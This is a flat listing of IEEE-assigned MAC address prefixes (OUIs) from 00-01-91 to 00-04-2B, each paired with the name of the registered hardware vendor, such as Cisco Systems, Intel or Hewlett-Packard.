00-01-91 (hex) SYRED Data Systems 00-01-92 (hex) Texas Digital Systems 00-01-93 (hex) Hanbyul Telecom Co., Ltd. 00-01-94 (hex) Capital Equipment Corporation 00-01-95 (hex) Sena Technologies, Inc. 00-01-96 (hex) Cisco Systems, Inc. 00-01-97 (hex) Cisco Systems, Inc. 00-01-98 (hex) Darim Vision 00-01-99 (hex) HeiSei Electronics 00-01-9A (hex) LEUNIG GmbH 00-01-9B (hex) Kyoto Microcomputer Co., Ltd. 00-01-9C (hex) JDS Uniphase Inc. 00-01-9D (hex) E-Control Systems, Inc. 00-01-9E (hex) ESS Technology, Inc. 00-01-9F (hex) Phonex Broadband 00-01-A0 (hex) Infinilink Corporation 00-01-A1 (hex) Mag-Tek, Inc. 00-01-A2 (hex) Logical Co., Ltd. 00-01-A3 (hex) GENESYS LOGIC, INC. 00-01-A4 (hex) Microlink Corporation 00-01-A5 (hex) Nextcomm, Inc. 00-01-A6 (hex) Scientific-Atlanta Arcodan A/S 00-01-A7 (hex) UNEX TECHNOLOGY CORPORATION 00-01-A8 (hex) Welltech Computer Co., Ltd. 00-01-A9 (hex) BMW AG 00-01-AA (hex) Airspan Communications, Ltd. 00-01-AB (hex) Main Street Networks 00-01-AC (hex) Sitara Networks, Inc. 00-01-AD (hex) Coach Master International d.b.a. CMI Worldwide, Inc. 00-01-AE (hex) Trex Enterprises 00-01-AF (hex) Emerson Network Power 00-01-B0 (hex) Fulltek Technology Co., Ltd. 00-01-B1 (hex) General Bandwidth 00-01-B2 (hex) Digital Processing Systems, Inc. 00-01-B3 (hex) Precision Electronic Manufacturing 00-01-B4 (hex) Wayport, Inc. 00-01-B5 (hex) Turin Networks, Inc. 00-01-B6 (hex) SAEJIN T&M Co., Ltd. 00-01-B7 (hex) Centos, Inc. 00-01-B8 (hex) Netsensity, Inc. 00-01-B9 (hex) SKF Condition Monitoring 00-01-BA (hex) IC-Net, Inc. 00-01-BB (hex) Frequentis 00-01-BC (hex) Brains Corporation 00-01-BD (hex) Peterson Electro-Musical Products, Inc. 00-01-BE (hex) Gigalink Co., Ltd. 00-01-BF (hex) Teleforce Co., Ltd. 00-01-C0 (hex) CompuLab, Ltd. 00-01-C1 (hex) Vitesse Semiconductor Corporation 00-01-C2 (hex) ARK Research Corp. 00-01-C3 (hex) Acromag, Inc. 00-01-C4 (hex) NeoWave, Inc. 00-01-C5 (hex) Simpler Networks 00-01-C6 (hex) Quarry Technologies 00-01-C7 (hex) Cisco Systems, Inc. 00-01-C8 (hex) THOMAS CONRAD CORP. 00-01-C8 (hex) CONRAD CORP. 00-01-C9 (hex) Cisco Systems, Inc. 00-01-CA (hex) Geocast Network Systems, Inc. 00-01-CB (hex) EVR 00-01-CC (hex) Japan Total Design Communication Co., Ltd. 00-01-CD (hex) ARtem 00-01-CE (hex) Custom Micro Products, Ltd. 00-01-CF (hex) Alpha Data Parallel Systems, Ltd. 00-01-D0 (hex) VitalPoint, Inc. 00-01-D1 (hex) CoNet Communications, Inc. 00-01-D2 (hex) inXtron, Inc. 00-01-D3 (hex) PAXCOMM, Inc. 00-01-D4 (hex) Leisure Time, Inc. 00-01-D5 (hex) HAEDONG INFO & COMM CO., LTD 00-01-D6 (hex) manroland AG 00-01-D7 (hex) F5 Networks, Inc. 00-01-D8 (hex) Teltronics, Inc. 00-01-D9 (hex) Sigma, Inc. 00-01-DA (hex) WINCOMM Corporation 00-01-DB (hex) Freecom Technologies GmbH 00-01-DC (hex) Activetelco 00-01-DD (hex) Avail Networks 00-01-DE (hex) Trango Systems, Inc. 00-01-DF (hex) ISDN Communications, Ltd. 00-01-E0 (hex) Fast Systems, Inc. 00-01-E1 (hex) Kinpo Electronics, Inc. 00-01-E2 (hex) Ando Electric Corporation 00-01-E3 (hex) Siemens AG 00-01-E4 (hex) Sitera, Inc. 00-01-E5 (hex) Supernet, Inc. 00-01-E6 (hex) Hewlett-Packard Company 00-01-E7 (hex) Hewlett-Packard Company 00-01-E8 (hex) Force10 Networks, Inc. 00-01-E9 (hex) Litton Marine Systems B.V. 00-01-EA (hex) Cirilium Corp. 00-01-EB (hex) C-COM Corporation 00-01-EC (hex) Ericsson Group 00-01-ED (hex) SETA Corp. 00-01-EE (hex) Comtrol Europe, Ltd. 00-01-EF (hex) Camtel Technology Corp. 00-01-F0 (hex) Tridium, Inc. 00-01-F1 (hex) Innovative Concepts, Inc. 00-01-F2 (hex) Mark of the Unicorn, Inc. 00-01-F3 (hex) QPS, Inc. 00-01-F4 (hex) Enterasys Networks 00-01-F5 (hex) ERIM S.A. 00-01-F6 (hex) Association of Musical Electronics Industry 00-01-F7 (hex) Image Display Systems, Inc. 00-01-F8 (hex) Adherent Systems, Ltd. 00-01-F9 (hex) TeraGlobal Communications Corp. 00-01-FA (hex) HOROSCAS 00-01-FB (hex) DoTop Technology, Inc. 00-01-FC (hex) Keyence Corporation 00-01-FD (hex) Digital Voice Systems, Inc. 00-01-FE (hex) DIGITAL EQUIPMENT CORPORATION 00-01-FF (hex) Data Direct Networks, Inc. 00-02-00 (hex) Net & Sys Co., Ltd. 00-02-01 (hex) IFM Electronic gmbh 00-02-02 (hex) Amino Communications, Ltd. 00-02-03 (hex) Woonsang Telecom, Inc. 00-02-04 (hex) Bodmann Industries Elektronik GmbH 00-02-05 (hex) Hitachi Denshi, Ltd. 00-02-06 (hex) Telital R&D Denmark A/S 00-02-07 (hex) VisionGlobal Network Corp. 00-02-08 (hex) Unify Networks, Inc. 00-02-09 (hex) Shenzhen SED Information Technology Co., Ltd. 00-02-0A (hex) Gefran Spa 00-02-0B (hex) Native Networks, Inc. 00-02-0C (hex) Metro-Optix 00-02-0D (hex) Micronpc.com 00-02-0E (hex) ECI Telecom, Ltd., NSD-US 00-02-0F (hex) AATR 00-02-10 (hex) Fenecom 00-02-11 (hex) Nature Worldwide Technology Corp. 00-02-12 (hex) SierraCom 00-02-13 (hex) S.D.E.L. 00-02-14 (hex) DTVRO 00-02-15 (hex) Cotas Computer Technology A/B 00-02-16 (hex) Cisco Systems, Inc. 00-02-17 (hex) Cisco Systems, Inc. 00-02-18 (hex) Advanced Scientific Corp 00-02-19 (hex) Paralon Technologies 00-02-1A (hex) Zuma Networks 00-02-1B (hex) Kollmorgen-Servotronix 00-02-1C (hex) Network Elements, Inc. 00-02-1D (hex) Data General Communication Ltd. 00-02-1E (hex) SIMTEL S.R.L. 00-02-1F (hex) Aculab PLC 00-02-20 (hex) CANON FINETECH INC. 00-02-21 (hex) DSP Application, Ltd. 00-02-22 (hex) Chromisys, Inc. 00-02-23 (hex) ClickTV 00-02-24 (hex) C-COR 00-02-25 (hex) One Stop Systems 00-02-26 (hex) XESystems, Inc. 00-02-27 (hex) ESD Electronic System Design GmbH 00-02-28 (hex) Necsom, Ltd. 00-02-29 (hex) Adtec Corporation 00-02-2A (hex) Asound Electronic 00-02-2B (hex) SAXA, Inc. 00-02-2C (hex) ABB Bomem, Inc. 00-02-2D (hex) Agere Systems 00-02-2E (hex) TEAC Corp. R& D 00-02-2F (hex) P-Cube, Ltd. 00-02-30 (hex) Intersoft Electronics 00-02-31 (hex) Ingersoll-Rand 00-02-32 (hex) Avision, Inc. 00-02-33 (hex) Mantra Communications, Inc. 00-02-34 (hex) Imperial Technology, Inc. 00-02-35 (hex) Paragon Networks International 00-02-36 (hex) INIT GmbH 00-02-37 (hex) Cosmo Research Corp. 00-02-38 (hex) Serome Technology, Inc. 00-02-39 (hex) Visicom 00-02-3A (hex) ZSK Stickmaschinen GmbH 00-02-3B (hex) Ericsson 00-02-3C (hex) Creative Technology, Ltd. 00-02-3D (hex) Cisco Systems, Inc. 00-02-3E (hex) Selta Telematica S.p.a 00-02-3F (hex) Compal Electronics, Inc. 00-02-40 (hex) Seedek Co., Ltd. 00-02-41 (hex) Amer.com 00-02-42 (hex) Videoframe Systems 00-02-43 (hex) Raysis Co., Ltd. 00-02-44 (hex) SURECOM Technology Co. 00-02-45 (hex) Lampus Co, Ltd. 00-02-46 (hex) All-Win Tech Co., Ltd. 00-02-47 (hex) Great Dragon Information Technology (Group) Co., Ltd. 00-02-48 (hex) Pilz GmbH & Co. 00-02-49 (hex) Aviv Infocom Co, Ltd. 00-02-4A (hex) Cisco Systems, Inc. 00-02-4B (hex) Cisco Systems, Inc. 00-02-4C (hex) SiByte, Inc. 00-02-4D (hex) Mannesman Dematic Colby Pty. Ltd. 00-02-4E (hex) Datacard Group 00-02-4F (hex) IPM Datacom S.R.L. 00-02-50 (hex) Geyser Networks, Inc. 00-02-51 (hex) Soma Networks, Inc. 00-02-52 (hex) Carrier Corporation 00-02-53 (hex) Televideo, Inc. 00-02-54 (hex) WorldGate 00-02-55 (hex) IBM Corp 00-02-56 (hex) Alpha Processor, Inc. 00-02-57 (hex) Microcom Corp. 00-02-58 (hex) Flying Packets Communications 00-02-59 (hex) Tsann Kuen China (Shanghai)Enterprise Co., Ltd. IT Group 00-02-5A (hex) Catena Networks 00-02-5B (hex) Cambridge Silicon Radio 00-02-5C (hex) SCI Systems (Kunshan) Co., Ltd. 00-02-5D (hex) Calix Networks 00-02-5E (hex) High Technology Ltd 00-02-5F (hex) Nortel Networks 00-02-60 (hex) Accordion Networks, Inc. 00-02-61 (hex) Tilgin AB 00-02-62 (hex) Soyo Group Soyo Com Tech Co., Ltd 00-02-63 (hex) UPS Manufacturing SRL 00-02-64 (hex) AudioRamp.com 00-02-65 (hex) Virditech Co. Ltd. 00-02-66 (hex) Thermalogic Corporation 00-02-67 (hex) NODE RUNNER, INC. 00-02-68 (hex) Harris Government Communications 00-02-69 (hex) Nadatel Co., Ltd 00-02-6A (hex) Cocess Telecom Co., Ltd. 00-02-6B (hex) BCM Computers Co., Ltd. 00-02-6C (hex) Philips CFT 00-02-6D (hex) Adept Telecom 00-02-6E (hex) NeGeN Access, Inc. 00-02-6F (hex) Senao International Co., Ltd. 00-02-70 (hex) Crewave Co., Ltd. 00-02-71 (hex) Zhone Technologies 00-02-72 (hex) CC&C Technologies, Inc. 00-02-73 (hex) Coriolis Networks 00-02-74 (hex) Tommy Technologies Corp. 00-02-75 (hex) SMART Technologies, Inc. 00-02-76 (hex) Primax Electronics Ltd. 00-02-77 (hex) Cash Systemes Industrie 00-02-78 (hex) Samsung Electro-Mechanics Co., Ltd. Pai-dal-gu, Kyoung-gi-do, 00-02-79 (hex) Control Applications, Ltd. 00-02-7A (hex) IOI Technology Corporation 00-02-7B (hex) Amplify Net, Inc. 00-02-7C (hex) Trilithic, Inc. 00-02-7D (hex) Cisco Systems, Inc. 00-02-7E (hex) Cisco Systems, Inc. 00-02-7F (hex) ask-technologies.com 00-02-80 (hex) Mu Net, Inc. 00-02-81 (hex) Madge Ltd. 00-02-82 (hex) ViaClix, Inc. 00-02-83 (hex) Spectrum Controls, Inc. 00-02-84 (hex) AREVA T&D 00-02-85 (hex) Riverstone Networks 00-02-86 (hex) Occam Networks 00-02-87 (hex) Adapcom 00-02-88 (hex) GLOBAL VILLAGE COMMUNICATION 00-02-89 (hex) DNE Technologies 00-02-8A (hex) Ambit Microsystems Corporation 00-02-8B (hex) VDSL Systems OY 00-02-8C (hex) Micrel-Synergy Semiconductor 00-02-8D (hex) Movita Technologies, Inc. 00-02-8E (hex) Rapid 5 Networks, Inc. 00-02-8F (hex) Globetek, Inc. 00-02-90 (hex) Woorigisool, Inc. 00-02-91 (hex) Open Network Co., Ltd. 00-02-92 (hex) Logic Innovations, Inc. 00-02-93 (hex) Solid Data Systems 00-02-94 (hex) Tokyo Sokushin Co., Ltd. 00-02-95 (hex) IP.Access Limited 00-02-96 (hex) Lectron Co,. Ltd. 00-02-97 (hex) C-COR.net 00-02-98 (hex) Broadframe Corporation 00-02-99 (hex) Apex, Inc. 00-02-9A (hex) Storage Apps 00-02-9B (hex) Kreatel Communications AB 00-02-9C (hex) 3COM 00-02-9D (hex) Merix Corp. Machum-Dong, Song-Pa-ku 00-02-9E (hex) Information Equipment Co., Ltd. 00-02-9F (hex) L-3 Communication Aviation Recorders 00-02-A0 (hex) Flatstack Ltd. 00-02-A1 (hex) World Wide Packets 00-02-A2 (hex) Hilscher GmbH 00-02-A3 (hex) ABB Switzerland Ltd, Power Systems 00-02-A4 (hex) AddPac Technology Co., Ltd. 00-02-A5 (hex) Hewlett-Packard Company 00-02-A6 (hex) Effinet Systems Co., Ltd. 00-02-A7 (hex) Vivace Networks 00-02-A8 (hex) Air Link Technology 00-02-A9 (hex) RACOM, s.r.o. 00-02-AA (hex) PLcom Co., Ltd. 00-02-AB (hex) CTC Union Technologies Co., Ltd. 00-02-AC (hex) 3PAR data 00-02-AD (hex) HOYA Corporation 00-02-AE (hex) Scannex Electronics Ltd. 00-02-AF (hex) TeleCruz Technology, Inc. 00-02-B0 (hex) Hokubu Communication & Industrial Co., Ltd. 00-02-B1 (hex) Anritsu, Ltd. 00-02-B2 (hex) Cablevision 00-02-B3 (hex) Intel Corporation 00-02-B4 (hex) DAPHNE 00-02-B5 (hex) Avnet, Inc. 00-02-B6 (hex) Acrosser Technology Co., Ltd. 00-02-B7 (hex) Watanabe Electric Industry Co., Ltd. 00-02-B8 (hex) WHI KONSULT AB 00-02-B9 (hex) Cisco Systems, Inc. 00-02-BA (hex) Cisco Systems, Inc. 00-02-BB (hex) Continuous Computing Corp 00-02-BC (hex) LVL 7 Systems, Inc. 00-02-BD (hex) Bionet Co., Ltd. 00-02-BE (hex) Totsu Engineering, Inc. 00-02-BF (hex) dotRocket, Inc. 00-02-C0 (hex) Bencent Tzeng Industry Co., Ltd. 00-02-C1 (hex) Innovative Electronic Designs, Inc. 00-02-C2 (hex) Net Vision Telecom 00-02-C3 (hex) Arelnet Ltd. 00-02-C4 (hex) Vector International BVBA 00-02-C5 (hex) Evertz Microsystems Ltd. 00-02-C6 (hex) Data Track Technology PLC 00-02-C7 (hex) ALPS ELECTRIC Co., Ltd. 00-02-C8 (hex) Technocom Communications Technology (pte) Ltd 00-02-C9 (hex) Mellanox Technologies 00-02-CA (hex) EndPoints, Inc. 00-02-CB (hex) TriState Ltd. 00-02-CC (hex) M.C.C.I 00-02-CD (hex) TeleDream, Inc. 00-02-CE (hex) FoxJet, Inc. 00-02-CF (hex) ZyGate Communications, Inc. 00-02-D0 (hex) Comdial Corporation 00-02-D1 (hex) Vivotek, Inc. 00-02-D2 (hex) Workstation AG 00-02-D3 (hex) NetBotz, Inc. 00-02-D4 (hex) PDA Peripherals, Inc. 00-02-D5 (hex) ACR 00-02-D6 (hex) NICE Systems 00-02-D7 (hex) EMPEG Ltd 00-02-D8 (hex) BRECIS Communications Corporation 00-02-D9 (hex) Reliable Controls 00-02-DA (hex) ExiO Communications, Inc. 00-02-DB (hex) NETSEC 00-02-DC (hex) Fujitsu General Limited 00-02-DD (hex) Bromax Communications, Ltd. 00-02-DE (hex) Astrodesign, Inc. 00-02-DF (hex) Net Com Systems, Inc. 00-02-E0 (hex) ETAS GmbH 00-02-E1 (hex) Integrated Network Corporation 00-02-E2 (hex) NDC Infared Engineering 00-02-E3 (hex) LITE-ON Communications, Inc. 00-02-E4 (hex) JC HYUN Systems, Inc. 00-02-E5 (hex) Timeware Ltd. 00-02-E6 (hex) Gould Instrument Systems, Inc. 00-02-E7 (hex) CAB GmbH & Co KG 00-02-E8 (hex) E.D.&A. 00-02-E9 (hex) CS Systemes De Securite - C3S 00-02-EA (hex) Focus Enhancements 00-02-EB (hex) Pico Communications 00-02-EC (hex) Maschoff Design Engineering 00-02-ED (hex) DXO Telecom Co., Ltd. 00-02-EE (hex) Nokia Danmark A/S 00-02-EF (hex) CCC Network Systems Group Ltd. 00-02-F0 (hex) AME Optimedia Technology Co., Ltd. 00-02-F1 (hex) Pinetron Co., Ltd. 00-02-F2 (hex) eDevice, Inc. 00-02-F3 (hex) Media Serve Co., Ltd. 00-02-F4 (hex) PCTEL, Inc. 00-02-F5 (hex) VIVE Synergies, Inc. 00-02-F6 (hex) Equipe Communications 00-02-F7 (hex) ARM 00-02-F8 (hex) SEAKR Engineering, Inc. 00-02-F9 (hex) Mimos Semiconductor SDN BHD 00-02-FA (hex) DX Antenna Co., Ltd. 00-02-FB (hex) Baumuller Aulugen-Systemtechnik GmbH 00-02-FC (hex) Cisco Systems, Inc. 00-02-FD (hex) Cisco Systems, Inc. 00-02-FE (hex) Viditec, Inc. 00-02-FF (hex) Handan BroadInfoCom 00-03-00 (hex) Barracuda Networks, Inc. 00-03-01 (hex) Avantas Networks Corporation 00-03-02 (hex) Charles Industries, Ltd. 00-03-03 (hex) JAMA Electronics Co., Ltd. 00-03-04 (hex) Pacific Broadband Communications 00-03-05 (hex) MSC Vertriebs GmbH 00-03-06 (hex) Fusion In Tech Co., Ltd. 00-03-07 (hex) Secure Works, Inc. 00-03-08 (hex) AM Communications, Inc. 00-03-09 (hex) Texcel Technology PLC 00-03-0A (hex) Argus Technologies 00-03-0B (hex) Hunter Technology, Inc. 00-03-0C (hex) Telesoft Technologies Ltd. 00-03-0D (hex) Uniwill Computer Corp. 00-03-0E (hex) Core Communications Co., Ltd. 00-03-0F (hex) Digital China (Shanghai) Networks Ltd. 00-03-10 (hex) ITX E-Globaledge Corporation 00-03-11 (hex) Micro Technology Co., Ltd. 00-03-12 (hex) TR-Systemtechnik GmbH 00-03-13 (hex) Access Media SPA 00-03-14 (hex) Teleware Network Systems 00-03-15 (hex) Cidco Incorporated 00-03-16 (hex) Nobell Communications, Inc. 00-03-17 (hex) Merlin Systems, Inc. 00-03-18 (hex) Cyras Systems, Inc. 00-03-19 (hex) Infineon AG 00-03-1A (hex) Beijing Broad Telecom Ltd., China 00-03-1B (hex) Cellvision Systems, Inc. 00-03-1C (hex) Svenska Hardvarufabriken AB 00-03-1D (hex) Taiwan Commate Computer, Inc. 00-03-1E (hex) Optranet, Inc. 00-03-1F (hex) Condev Ltd. 00-03-20 (hex) Xpeed, Inc. 00-03-21 (hex) Reco Research Co., Ltd. 00-03-22 (hex) IDIS Co., Ltd. 00-03-23 (hex) Cornet Technology, Inc. 00-03-24 (hex) SANYO Consumer Electronics Co., Ltd. 00-03-25 (hex) Arima Computer Corp. 00-03-26 (hex) Iwasaki Information Systems Co., Ltd. 00-03-27 (hex) ACT'L 00-03-28 (hex) Mace Group, Inc. 00-03-29 (hex) F3, Inc. 00-03-2A (hex) UniData Communication Systems, Inc. 00-03-2B (hex) GAI Datenfunksysteme GmbH 00-03-2C (hex) ABB Switzerland Ltd 00-03-2D (hex) IBASE Technology, Inc. 00-03-2E (hex) Scope Information Management, Ltd. 00-03-2F (hex) Global Sun Technology, Inc. 00-03-30 (hex) Imagenics, Co., Ltd. 00-03-31 (hex) Cisco Systems, Inc. 00-03-32 (hex) Cisco Systems, Inc. 00-03-33 (hex) Digitel Co., Ltd. 00-03-34 (hex) Newport Electronics 00-03-35 (hex) Mirae Technology 00-03-36 (hex) Zetes Technologies 00-03-37 (hex) Vaone, Inc. 00-03-38 (hex) Oak Technology 00-03-39 (hex) Eurologic Systems, Ltd. 00-03-3A (hex) Silicon Wave, Inc. 00-03-3B (hex) TAMI Tech Co., Ltd. 00-03-3C (hex) Daiden Co., Ltd. 00-03-3D (hex) ILSHin Lab 00-03-3E (hex) Tateyama System Laboratory Co., Ltd. 00-03-3F (hex) BigBand Networks, Ltd. 00-03-40 (hex) Floware Wireless Systems, Ltd. 00-03-41 (hex) Axon Digital Design 00-03-42 (hex) Nortel Networks 00-03-43 (hex) Martin Professional A/S 00-03-44 (hex) Tietech.Co., Ltd. 00-03-45 (hex) Routrek Networks Corporation 00-03-46 (hex) Hitachi Kokusai Electric, Inc. 00-03-47 (hex) Intel Corporation 00-03-48 (hex) Norscan Instruments, Ltd. 00-03-49 (hex) Vidicode Datacommunicatie B.V. 00-03-4A (hex) RIAS Corporation 00-03-4B (hex) Nortel Networks 00-03-4C (hex) Shanghai DigiVision Technology Co., Ltd. 00-03-4D (hex) Chiaro Networks, Ltd. 00-03-4E (hex) Pos Data Company, Ltd. 00-03-4F (hex) Sur-Gard Security 00-03-50 (hex) BTICINO SPA 00-03-51 (hex) Diebold, Inc. 00-03-52 (hex) Colubris Networks 00-03-53 (hex) Mitac, Inc. 00-03-54 (hex) Fiber Logic Communications 00-03-55 (hex) TeraBeam Internet Systems 00-03-56 (hex) Wincor Nixdorf International GmbH 00-03-57 (hex) Intervoice-Brite, Inc. 00-03-58 (hex) Hanyang Digitech Co., Ltd. 00-03-59 (hex) DigitalSis 00-03-5A (hex) Photron Limited 00-03-5B (hex) BridgeWave Communications 00-03-5C (hex) Saint Song Corp. 00-03-5D (hex) Bosung Hi-Net Co., Ltd. 00-03-5E (hex) Metropolitan Area Networks, Inc. 00-03-5F (hex) Prueftechnik Condition Monitoring GmbH & Co. KG 00-03-60 (hex) PAC Interactive Technology, Inc. 00-03-61 (hex) Widcomm, Inc. 00-03-62 (hex) Vodtel Communications, Inc. 00-03-63 (hex) Miraesys Co., Ltd. 00-03-64 (hex) Scenix Semiconductor, Inc. 00-03-65 (hex) Kira Information & Communications, Ltd. 00-03-66 (hex) ASM Pacific Technology 00-03-67 (hex) Jasmine Networks, Inc. 00-03-68 (hex) Embedone Co., Ltd. 00-03-69 (hex) Nippon Antenna Co., Ltd. 00-03-6A (hex) Mainnet, Ltd. 00-03-6B (hex) Cisco Systems, Inc. 00-03-6C (hex) Cisco Systems, Inc. 00-03-6D (hex) Runtop, Inc. 00-03-6E (hex) Nicon Systems (Pty) Limited 00-03-6F (hex) Telsey SPA 00-03-70 (hex) NXTV, Inc. 00-03-71 (hex) Acomz Networks Corp. 00-03-72 (hex) ULAN 00-03-73 (hex) Aselsan A.S 00-03-74 (hex) Control Microsystems 00-03-75 (hex) NetMedia, Inc. 00-03-76 (hex) Graphtec Technology, Inc. 00-03-77 (hex) Gigabit Wireless 00-03-78 (hex) HUMAX Co., Ltd. 00-03-79 (hex) Proscend Communications, Inc. 00-03-7A (hex) Taiyo Yuden Co., Ltd. 00-03-7B (hex) IDEC IZUMI Corporation 00-03-7C (hex) Coax Media 00-03-7D (hex) Stellcom 00-03-7E (hex) PORTech Communications, Inc. 00-03-7F (hex) Atheros Communications, Inc. 00-03-80 (hex) SSH Communications Security Corp. 00-03-81 (hex) Ingenico International 00-03-82 (hex) A-One Co., Ltd. 00-03-83 (hex) Metera Networks, Inc. 00-03-84 (hex) AETA 00-03-85 (hex) Actelis Networks, Inc. 00-03-86 (hex) Ho Net, Inc. 00-03-87 (hex) Blaze Network Products 00-03-88 (hex) Fastfame Technology Co., Ltd. 00-03-89 (hex) Plantronics 00-03-8A (hex) America Online, Inc. 00-03-8B (hex) PLUS-ONE I&T, Inc. 00-03-8C (hex) Total Impact 00-03-8D (hex) PCS Revenue Control Systems, Inc. 00-03-8E (hex) Atoga Systems, Inc. 00-03-8F (hex) Weinschel Corporation 00-03-90 (hex) Digital Video Communications, Inc. 00-03-91 (hex) Advanced Digital Broadcast, Ltd. 00-03-92 (hex) Hyundai Teletek Co., Ltd. 00-03-93 (hex) Apple Computer, Inc. 00-03-94 (hex) Connect One 00-03-95 (hex) California Amplifier 00-03-96 (hex) EZ Cast Co., Ltd. 00-03-97 (hex) Watchfront Limited 00-03-98 (hex) WISI 00-03-99 (hex) Dongju Informations & Communications Co., Ltd. 00-03-9A (hex) SiConnect 00-03-9B (hex) NetChip Technology, Inc. 00-03-9C (hex) OptiMight Communications, Inc. 00-03-9D (hex) Qisda Corporation 00-03-9E (hex) Tera System Co., Ltd. 00-03-9F (hex) Cisco Systems, Inc. 00-03-A0 (hex) Cisco Systems, Inc. 00-03-A1 (hex) HIPER Information & Communication, Inc. 00-03-A2 (hex) Catapult Communications 00-03-A3 (hex) MAVIX, Ltd. 00-03-A4 (hex) Imation Corp. 00-03-A5 (hex) Medea Corporation 00-03-A6 (hex) Traxit Technology, Inc. 00-03-A7 (hex) Unixtar Technology, Inc. 00-03-A8 (hex) IDOT Computers, Inc. 00-03-A9 (hex) AXCENT Media AG 00-03-AA (hex) Watlow 00-03-AB (hex) Bridge Information Systems 00-03-AC (hex) Fronius Schweissmaschinen 00-03-AD (hex) Emerson Energy Systems AB 00-03-AE (hex) Allied Advanced Manufacturing Pte, Ltd. 00-03-AF (hex) Paragea Communications 00-03-B0 (hex) Xsense Technology Corp. 00-03-B1 (hex) Hospira Inc. 00-03-B2 (hex) Radware 00-03-B3 (hex) IA Link Systems Co., Ltd. 00-03-B4 (hex) Macrotek International Corp. 00-03-B5 (hex) Entra Technology Co. 00-03-B6 (hex) QSI Corporation 00-03-B7 (hex) ZACCESS Systems 00-03-B8 (hex) NetKit Solutions, LLC 00-03-B9 (hex) Hualong Telecom Co., Ltd. 00-03-BA (hex) Oracle Corporation 00-03-BB (hex) Signal Communications Limited 00-03-BC (hex) COT GmbH 00-03-BD (hex) OmniCluster Technologies, Inc. 00-03-BE (hex) Netility 00-03-BF (hex) Centerpoint Broadband Technologies, Inc. 00-03-C0 (hex) RFTNC Co., Ltd. 00-03-C1 (hex) Packet Dynamics Ltd 00-03-C2 (hex) Solphone K.K. 00-03-C3 (hex) Micronik Multimedia 00-03-C4 (hex) Tomra Systems ASA 00-03-C5 (hex) Mobotix AG 00-03-C6 (hex) ICUE Systems, Inc. 00-03-C7 (hex) hopf Elektronik GmbH 00-03-C8 (hex) CML Emergency Services 00-03-C9 (hex) TECOM Co., Ltd. 00-03-CA (hex) MTS Systems Corp. 00-03-CB (hex) Nippon Systems Development Co., Ltd. 00-03-CC (hex) Momentum Computer, Inc. 00-03-CD (hex) Clovertech, Inc. 00-03-CE (hex) ETEN Technologies, Inc. 00-03-CF (hex) Muxcom, Inc. 00-03-D0 (hex) KOANKEISO Co., Ltd. 00-03-D1 (hex) Takaya Corporation 00-03-D2 (hex) Crossbeam Systems, Inc. 00-03-D3 (hex) Internet Energy Systems, Inc. 00-03-D4 (hex) Alloptic, Inc. 00-03-D5 (hex) Advanced Communications Co., Ltd. 00-03-D6 (hex) RADVision, Ltd. 00-03-D7 (hex) NextNet Wireless, Inc. 00-03-D8 (hex) iMPath Networks, Inc. 00-03-D9 (hex) Secheron SA 00-03-DA (hex) Takamisawa Cybernetics Co., Ltd. 00-03-DB (hex) Apogee Electronics Corp. 00-03-DC (hex) Lexar Media, Inc. 00-03-DD (hex) Comark Corp. 00-03-DE (hex) OTC Wireless 00-03-DF (hex) Desana Systems 00-03-E0 (hex) Motorola, Inc. 00-03-E1 (hex) Winmate Communication, Inc. 00-03-E2 (hex) Comspace Corporation 00-03-E3 (hex) Cisco Systems, Inc. 00-03-E4 (hex) Cisco Systems, Inc. 00-03-E5 (hex) Hermstedt SG 00-03-E6 (hex) Entone, Inc. 00-03-E7 (hex) Logostek Co. Ltd. 00-03-E8 (hex) Wavelength Digital Limited 00-03-E9 (hex) Akara Canada, Inc. 00-03-EA (hex) Mega System Technologies, Inc. 00-03-EB (hex) Atrica 00-03-EC (hex) ICG Research, Inc. 00-03-ED (hex) Shinkawa Electric Co., Ltd. 00-03-EE (hex) MKNet Corporation 00-03-EF (hex) Oneline AG 00-03-F0 (hex) Redfern Broadband Networks 00-03-F1 (hex) Cicada Semiconductor, Inc. 00-03-F2 (hex) Seneca Networks 00-03-F3 (hex) Dazzle Multimedia, Inc. 00-03-F4 (hex) NetBurner 00-03-F5 (hex) Chip2Chip 00-03-F6 (hex) Allegro Networks, Inc. 00-03-F7 (hex) Plast-Control GmbH 00-03-F8 (hex) SanCastle Technologies, Inc. 00-03-F9 (hex) Pleiades Communications, Inc. 00-03-FA (hex) TiMetra Networks 00-03-FB (hex) ENEGATE Co.,Ltd. 00-03-FC (hex) Intertex Data AB 00-03-FD (hex) Cisco Systems, Inc. 00-03-FE (hex) Cisco Systems, Inc. 00-03-FF (hex) Microsoft Corporation 00-04-00 (hex) LEXMARK INTERNATIONAL, INC. 00-04-01 (hex) Osaki Electric Co., Ltd. 00-04-02 (hex) Nexsan Technologies, Ltd. 00-04-03 (hex) Nexsi Corporation 00-04-04 (hex) Makino Milling Machine Co., Ltd. 00-04-05 (hex) ACN Technologies 00-04-06 (hex) Fa. Metabox AG 00-04-07 (hex) Topcon Positioning Systems, Inc. 00-04-08 (hex) Sanko Electronics Co., Ltd. 00-04-09 (hex) Cratos Networks 00-04-0A (hex) Sage Systems 00-04-0B (hex) 3com Europe Ltd. 00-04-0C (hex) KANNO Work's Ltd. 00-04-0D (hex) Avaya, Inc. 00-04-0E (hex) AVM GmbH 00-04-0F (hex) Asus Network Technologies, Inc. 00-04-10 (hex) Spinnaker Networks, Inc. 00-04-11 (hex) Inkra Networks, Inc. 00-04-12 (hex) WaveSmith Networks, Inc. 00-04-13 (hex) SNOM Technology AG 00-04-14 (hex) Umezawa Musen Denki Co., Ltd. 00-04-15 (hex) Rasteme Systems Co., Ltd. 00-04-16 (hex) Parks S/A Comunicacoes Digitais 00-04-17 (hex) ELAU AG 00-04-18 (hex) Teltronic S.A.U. 00-04-19 (hex) Fibercycle Networks, Inc. 00-04-1A (hex) Ines Test and Measurement GmbH & CoKG 00-04-1B (hex) Bridgeworks Ltd. 00-04-1C (hex) ipDialog, Inc. 00-04-1D (hex) Corega of America 00-04-1E (hex) Shikoku Instrumentation Co., Ltd. 00-04-1F (hex) Sony Computer Entertainment, Inc. 00-04-20 (hex) Slim Devices, Inc. 00-04-21 (hex) Ocular Networks 00-04-22 (hex) Gordon Kapes, Inc. 00-04-23 (hex) Intel Corporation 00-04-24 (hex) TMC s.r.l. 00-04-25 (hex) Atmel Corporation 00-04-26 (hex) Autosys 00-04-27 (hex) Cisco Systems, Inc. 00-04-28 (hex) Cisco Systems, Inc. 00-04-29 (hex) Pixord Corporation 00-04-2A (hex) Wireless Networks, Inc. 00-04-2B (hex) IT Access Co., Ltd. 